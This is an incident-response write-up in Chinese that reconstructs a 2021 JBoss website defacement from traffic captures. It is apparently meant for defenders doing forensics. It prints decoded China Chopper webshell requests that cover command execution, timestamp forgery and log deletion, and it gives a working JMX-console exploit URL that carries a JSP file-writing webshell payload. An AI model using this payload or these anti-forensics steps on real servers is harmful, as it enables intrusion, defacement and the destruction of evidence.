一次入侵溯源分析，通过流量完整还原黑客攻击手法

背景概述

2021年6月，某单位系统关键图片被篡改，网站疑似遭到入侵。

获取信息

从安全感知系统中导出近两天攻击行为日志，经分析处理共计1097条。

从全流量系统中导出遭受攻击当天流量包，经分析处理共计101,801,984字节（97MB）数据包。

入侵过程还原

由于图片被篡改，访问网页复制图片链接查看图片文件名。然后思考篡改图片大致流程为先下载图片，然后P图加上水印，然后再上传替换服务器上的图片。从攻击行为日志中检索图片文件名"logo.gif"，得到如下两条日志。可获知/August/August.jsp操作了这张图。（有经验的大佬可能通过这两行日志就已经看出来August.jsp是菜刀马了）

攻击者尝试攻击：x.x.x.x:9090/August/August.jsp，攻击代码为：a=F&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif

接下来从流量中检索 August.jsp，第一次出现的位置前后数据包可能存在上传马的数据包，使用wireshark打开数据包检索http contains "August.jsp" 得到源目的IP，做进一步检索，查看第一条追踪http流。

URL解码后得到 August.jsp 文件内容。（显然，August.jsp为菜刀马）

过滤 http.request.method=="POST" and http.request.uri =="/August/August.jsp"，根据流量中请求的POST参数一步一步还原攻击全过程。提取出请求如下：（很多环境中没有记录全流量，可以从能记录post参数的安全设备中导出，如WAF）

要理解这些参数对应的操作，需分析菜刀马。粗略分析，参数中的a=B中的a是菜刀马的密码，B则会调用菜刀马中的BB函数，a=M则意味着会调用菜刀马的MM函数，以此类推。接下来分析菜刀马的所有XX函数执行什么操作，分析整理如下：

a=A     //列出根目录

分析完菜刀马，我们就能很容易地通过流量中对马的请求参数来还原出攻击步骤，中间若干浏览目录的操作已省略。

请求参数

分析结果

a=M&z0=GB2312&z1=-c%2Fbin%2Fsh&z2=cd+%22%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2F%22%3Bid%3Becho+%5BS%5D%3Bpwd%3Becho+%5BE%5D

执行命令[id]

a=M&z0=GB2312&z1=-c%2Fbin%2Fsh&z2=cd+%22%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Fdeploy%2Fmanagement%2FAugust.war%2F%22%3Bnetstat+-ano%3Becho+%5BS%5D%3Bpwd%3Becho+%5BE%5D

执行命令[netstat -ano]

a=H&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2FAugust.jsp&z2=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2FAugust.jsp

复制文件/usr/local/jboss/server/default/./deploy/management/August.war/August.jsp到/usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war/August.jsp

a=I&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2FAugust.jsp&z2=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2Ftest.jsp

将/usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war/August.jsp重命名为test.jsp

a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war%2Ftest.jsp&z2=2008-07-19+02%3A21%3A04

将/usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war/test.jsp的最后修改时间改为2008-07-19  02:21:04

a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war&z2=2008-07-19+02%3A22%3A10

将/usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war的最后修改时间改为2008-07-19  02:22:10

a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war&z2=2021-06-25+16%3A10%3A58

将/usr/local/jboss/server/default/./deploy/management/August.war的最后修改时间改为2021-06-25  16:10:58   

a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2FAugust.jsp&z2=2021-06-25+16%3A10%3A58

将/usr/local/jboss/server/default/./deploy/management/August.war/August.jsp的最后修改时间改为2021-06-25  16:10:58

a=K&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2Fshell.jsp&z2=2021-06-25+16%3A10%3A58

将/usr/local/jboss/server/default/./deploy/management/August.war/shell.jsp的最后修改时间改为2021-06-25  16:10:58

a=M&z0=GB2312&z1=-c%2Fbin%2Fsh&z2=cd+%22%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war%2F%22%3Bps+aux%3Becho+%5BS%5D%3Bpwd%3Becho+%5BE%5D

执行系统命令[ps aux]

a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log

读取/usr/local/jboss/server/default/./log/server.log

a=D&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log&z2=1

将“1”写入/usr/local/jboss/server/default/./log/server.log

a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log.2021-06-20

读取/usr/local/jboss/server/default/./log/server.log.2021-06-20

a=F&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2FServerInfo.jsp

下载/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/ServerInfo.jsp

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2FServerInfo.jsp

删除/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/ServerInfo.jsp

a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Findex.html

读取/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/index.html

a=F&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif

下载/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/images/logo.gif

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif

删除/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/images/logo.gif

a=G&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fconsole-mgr.sar%2Fweb-console.war%2Fimages%2Flogo.gif&z2=474946383961E8036900F7000000...

将16进制写入/usr/local/jboss/server/default/./deploy/management/console-mgr.sar/web-console.war/images/logo.gif

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjmx-console.war

删除/usr/local/jboss/server/default/./deploy/jmx-console.war

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fjboss-web.deployer%2FROOT.war

删除/usr/local/jboss/server/default/./deploy/jboss-web.deployer/ROOT.war

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2Fjbossjdk.war

删除/usr/local/jboss/server/default/./deploy/management/jbossjdk.war

a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log

读取/usr/local/jboss/server/default/log/server.log

a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log

读取/usr/local/jboss/server/default/log/server.log

a=D&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log&z2=122

将“122”写入/usr/local/jboss/server/default/log/server.log

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-20

删除/usr/local/jboss/server/default/log/server.log.2021-06-20

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-21

删除/usr/local/jboss/server/default/log/server.log.2021-06-21

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-22

删除/usr/local/jboss/server/default/log/server.log.2021-06-22

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-23

删除/usr/local/jboss/server/default/log/server.log.2021-06-23

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-24

删除/usr/local/jboss/server/default/log/server.log.2021-06-24

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-25

删除/usr/local/jboss/server/default/log/server.log.2021-06-25

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-26

删除/usr/local/jboss/server/default/log/server.log.2021-06-26

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-27

删除/usr/local/jboss/server/default/log/server.log.2021-06-27

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2Flog%2Fserver.log.2021-06-28

删除/usr/local/jboss/server/default/log/server.log.2021-06-28

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fwork%2Fjboss.web%2Flocalhost%2Fjbossjdk

删除/usr/local/jboss/server/default/./work/jboss.web/localhost/jbossjdk

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fwork%2Fjboss.web%2Flocalhost%2F_

删除/usr/local/jboss/server/default/./work/jboss.web/localhost/_

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fwork%2Fjboss.web%2Flocalhost%2FAugust

删除/usr/local/jboss/server/default/./work/jboss.web/localhost/August

a=C&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log

读取/usr/local/jboss/server/default/./log/server.log

a=D&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Flog%2Fserver.log&z2=12

将“12”写入/usr/local/jboss/server/default/./log/server.log

a=E&z0=GB2312&z1=%2Fusr%2Flocal%2Fjboss%2Fserver%2Fdefault%2F.%2Fdeploy%2Fmanagement%2FAugust.war

删除/usr/local/jboss/server/default/./deploy/management/August.war

看到到这里大家应该会知道有一个August.war存在过，然后shell.jsp在August目录下，那shell.jsp应该在这个war里面。那shell.jsp的内容是什么？

根据前面写August.jsp的请求包可以推测其功能就是写文件。我们也可以从流量中将其内容找出来。
wireshark中检索 http contains "August.war"，查看第一条。

URL解码后：

/jmx-console//HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=August.war&argType=java.lang.String&&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%+if(request.getParameter("f")!=null)(new+java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());+%>&argType=boolean&arg4=True

根据该url，Google查一下就知道攻击者这是利用的什么漏洞，其中arg3就是shell.jsp的内容。

至此，整个攻击的来龙去脉都理得清清楚楚，从什么漏洞进去，如何替换图片，然后删除webshell清除日志……

还原被篡改的文件

被篡改的源文件已被删除，可从流量中还原。根据之前分析的菜刀参数，查找的流量包可检索http contains "a=F" and http contains "logo.gif"到下载图片的数据包。

进一步检索http contains "->|GIF89a" and http.response，复制-> as a Hex Stream。

然后你可以将其粘贴到UE或者winHex等16进制编辑器。这里介绍另一种方法，粘贴到txt，删除2d3e7c(->|)及以前的内容和7c3c2d(|<-)及之后的内容。

使用如下代码转换成二进制文件：

import sys

使用pyinsyaller打包成exe就更方便了，将txt拖到exe上面即可转换生成二进制文件。

附录：菜刀马解析备注

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>

InBug-实验室

官网：https://www.inbug.org/

InScan内网扫描器：https://github.com/inbug-team/InScan